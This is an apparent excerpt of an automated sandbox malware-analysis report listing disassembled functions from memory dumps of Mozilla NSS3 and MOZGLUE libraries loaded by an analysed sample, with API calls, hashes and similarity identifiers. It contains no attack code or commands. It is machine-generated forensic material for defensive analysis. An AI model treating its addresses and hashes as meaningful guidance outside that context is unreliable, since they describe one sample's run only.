                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: memcpy$memset
                                                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                                                        • API String ID: 438689982-4108050209
                                                                                                                                                                                                                                                                                        • Opcode ID: 6aaa86780b46f336ac65b1c9f00c5e3a62837c84b91b8e35e174f096710908ec
                                                                                                                                                                                                                                                                                        • Instruction ID: 16bdd90ed860428573128a8f95dcde8013c640ad3afdc97b1f8abe155211bf16
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6aaa86780b46f336ac65b1c9f00c5e3a62837c84b91b8e35e174f096710908ec
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B510376A0025A8FCB00CF19C890A9ABBB5EF99300F19C59DD8595F351D731ED0ACBE0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C866C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C866C8D
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C866CA9
                                                                                                                                                                                                                                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C866CC0
                                                                                                                                                                                                                                                                                        • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C988FE0), ref: 6C866CFE
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2370200771-0
                                                                                                                                                                                                                                                                                        • Opcode ID: baca789b992b6601b7f31c3231ec878dbb7590436a8535fa30d94907d94f400e
                                                                                                                                                                                                                                                                                        • Instruction ID: 911cadb928ea01e47207780611894c69c5949e07619339aa95e3da5e5de4f29e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: baca789b992b6601b7f31c3231ec878dbb7590436a8535fa30d94907d94f400e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B331A3B5A002169FEB14CF65C991ABFBBF5EF85248B10483DD905E7B40EB31D905CBA0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C786470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000200), ref: 6C78649B
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C75CA10: malloc.MOZGLUE(?), ref: 6C75CA26
                                                                                                                                                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000200), ref: 6C7864A9
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77FA80: GetCurrentThreadId.KERNEL32 ref: 6C77FA8D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77FA80: AcquireSRWLockExclusive.KERNEL32(6C7CF448,?,6C77FA1F,?,?,6C755407), ref: 6C77FA99
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32 ref: 6C78653F
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C78655A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3596744550-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 71048e7f4e2baadc5e539d779fd705371e7ecece738cff9579a2d517f11b5941
                                                                                                                                                                                                                                                                                        • Instruction ID: 27c94f43a922b6974cce9e60207a3d89b86450f91f33a06fe65cab041fb6b345
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 71048e7f4e2baadc5e539d779fd705371e7ecece738cff9579a2d517f11b5941
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 453172B5A05305AFDB00DF14D98869EBBE4FF89314F10843DE95A97741DB30EA19CB92
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C88ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CERT_NewCertList.NSS3 ref: 6C88ACC2
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C862F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C862F0A
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C862F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C862F1D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C862AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C860A1B,00000000), ref: 6C862AF0
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C862AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C862B11
                                                                                                                                                                                                                                                                                        • CERT_DestroyCertList.NSS3(00000000), ref: 6C88AD5E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C86B41E,00000000,00000000,?,00000000,?,6C86B41E,00000000,00000000,00000001,?), ref: 6C8A57E0
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8A57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C8A5843
                                                                                                                                                                                                                                                                                        • CERT_DestroyCertList.NSS3(?), ref: 6C88AD36
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C862F50: CERT_DestroyCertificate.NSS3(?), ref: 6C862F65
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C862F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C862F83
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C88AD4F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 132756963-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 6daded8f3c2ed01bf85ae374600e3da1acde64e848c2cb2830e06b66b8d3ba03
                                                                                                                                                                                                                                                                                        • Instruction ID: 21352aeaa1d4b865f03888621def78f859a076ca11f458657cc2fae278bacf3b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6daded8f3c2ed01bf85ae374600e3da1acde64e848c2cb2830e06b66b8d3ba03
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8821F6B1D012049BEF20DF68DA055EEB7B4EF05209F154478D805BBB80FB35AA49CBE1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C8BECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C8BF0AD,6C8BF150,?,6C8BF150,?,?,?), ref: 6C8BECBA
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C8687ED,00000800,6C85EF74,00000000), ref: 6C8C1000
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C0FF0: PR_NewLock.NSS3(?,00000800,6C85EF74,00000000), ref: 6C8C1016
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C0FF0: PL_InitArenaPool.NSS3(00000000,security,6C8687ED,00000008,?,00000800,6C85EF74,00000000), ref: 6C8C102B
                                                                                                                                                                                                                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C8BECD1
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C10C0: TlsGetValue.KERNEL32(?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C10F3
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C10C0: EnterCriticalSection.KERNEL32(?,?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C110C
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C10C0: PL_ArenaAllocate.NSS3(?,?,?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C1141
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C10C0: PR_Unlock.NSS3(?,?,?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C1182
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C10C0: TlsGetValue.KERNEL32(?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C119C
                                                                                                                                                                                                                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C8BED02
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8C10C0: PL_ArenaAllocate.NSS3(?,6C868802,00000000,00000008,?,6C85EF74,00000000), ref: 6C8C116E
                                                                                                                                                                                                                                                                                        • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C8BED5A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2957673229-0
                                                                                                                                                                                                                                                                                        • Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                                                                                                                                        • Instruction ID: 5a1faced458b2f804db48a34e122fc957917f9eb78525010b539744554d9ee49
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BC2104B1A007425FE310CF29DA44B52B7E4BFA4309F19C669E80C97B61E7B0E590C7D1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C75B4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C75B4F5
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C75B502
                                                                                                                                                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C7CF4B8), ref: 6C75B542
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(?), ref: 6C75B578
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2047719359-0
                                                                                                                                                                                                                                                                                        • Opcode ID: ae1804d75af52ecf7ce05aee833b46465b4dae774ea6725a0ea5ae97b66e984b
                                                                                                                                                                                                                                                                                        • Instruction ID: c8c7b76c961e18c0bdfaf38beb690d6d4be1a6e614240e3e289d29fb2eebd09a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae1804d75af52ecf7ce05aee833b46465b4dae774ea6725a0ea5ae97b66e984b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3311E131A04B46CBD7118F69C604761B3B4FF96319F50972AEC4953A02EBB4B2D48790
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C90AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C8F5F17,?,?,?,?,?,?,?,?,6C8FAAD4), ref: 6C90AC94
                                                                                                                                                                                                                                                                                        • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C8F5F17,?,?,?,?,?,?,?,?,6C8FAAD4), ref: 6C90ACA6
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C8FAAD4), ref: 6C90ACC0
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C8FAAD4), ref: 6C90ACDB
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: free$DestroyFreeK11_Monitor
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3989322779-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 5f6505fc45a835e38cc28a0cd10f61079f9fc7258ba09620976851c200333d65
                                                                                                                                                                                                                                                                                        • Instruction ID: 87e51982cd051d40b0e67e0b4220f6a5e26011deb8720a4860ef08f45c55244a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5f6505fc45a835e38cc28a0cd10f61079f9fc7258ba09620976851c200333d65
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 22014CB1701B119BEB60DF29D908757B7E8BF006A9B114839D85AD3E00EB35E055CBD1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C783DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C74F20E,?), ref: 6C783DF5
                                                                                                                                                                                                                                                                                        • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C74F20E,00000000,?), ref: 6C783DFC
                                                                                                                                                                                                                                                                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C783E06
                                                                                                                                                                                                                                                                                        • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C783E0E
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77CC00: GetCurrentProcess.KERNEL32(?,?,6C7431A7), ref: 6C77CC0D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C77CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C7431A7), ref: 6C77CC16
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2787204188-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 0c224a01dba1387fa2f0ca6418467146fb49270bf6d2bd1d4b1674245491114a
                                                                                                                                                                                                                                                                                        • Instruction ID: ff277cd9f8281edad642462a5b0132a2844f22cd1128bf7123848f16c9e1c235
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c224a01dba1387fa2f0ca6418467146fb49270bf6d2bd1d4b1674245491114a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43F01CB1A002097FEB00AB54DD89DAB376DEB46629F044031FE0857741D635BE6986F7
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C90AC00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • PK11_FreeSymKey.NSS3(?,6C8F5D40,00000000,?,?,6C8E6AC6,6C8F639C), ref: 6C90AC2D
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8AADC0: TlsGetValue.KERNEL32(?,6C88CDBB,?,6C88D079,00000000,00000001), ref: 6C8AAE10
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8AADC0: EnterCriticalSection.KERNEL32(?,?,6C88CDBB,?,6C88D079,00000000,00000001), ref: 6C8AAE24
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8AADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C88D079,00000000,00000001), ref: 6C8AAE5A
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8AADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C88CDBB,?,6C88D079,00000000,00000001), ref: 6C8AAE6F
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8AADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C88CDBB,?,6C88D079,00000000,00000001), ref: 6C8AAE7F
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8AADC0: TlsGetValue.KERNEL32(?,6C88CDBB,?,6C88D079,00000000,00000001), ref: 6C8AAEB1
                                                                                                                                                                                                                                                                                          • Part of subcall function 6C8AADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C88CDBB,?,6C88D079,00000000,00000001), ref: 6C8AAEC9
                                                                                                                                                                                                                                                                                        • PK11_FreeSymKey.NSS3(?,6C8F5D40,00000000,?,?,6C8E6AC6,6C8F639C), ref: 6C90AC44
                                                                                                                                                                                                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6C8F5D40,00000000,?,?,6C8E6AC6,6C8F639C), ref: 6C90AC59
                                                                                                                                                                                                                                                                                        • free.MOZGLUE(8CB6FF01,6C8E6AC6,6C8F639C,?,?,?,?,?,?,?,?,?,6C8F5D40,00000000,?,6C8FAAD4), ref: 6C90AC62
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468798495.000000006C9BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468849903.000000006C9BF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468897034.000000006C9C0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468931608.000000006C9C5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c7e0000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1595327144-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 2b76d8db2b5ceb3db712bf032370274ef73e9f09e8979803e52927a873c3a666
                                                                                                                                                                                                                                                                                        • Instruction ID: 8769601636e41422fcd97398b6807df20e1032498a6d83a8ff4a874c96bc738d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2b76d8db2b5ceb3db712bf032370274ef73e9f09e8979803e52927a873c3a666
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA018BB56002109FDB10CF28E9C0B8677ACAF14B5DF188468E9499FB06DB30E848CBA1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 6C97CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468341392.000000006C7E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7E0000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468321043.000000006C7E0000.00000002.00000001.01000000.00000008.sdmpDownload File
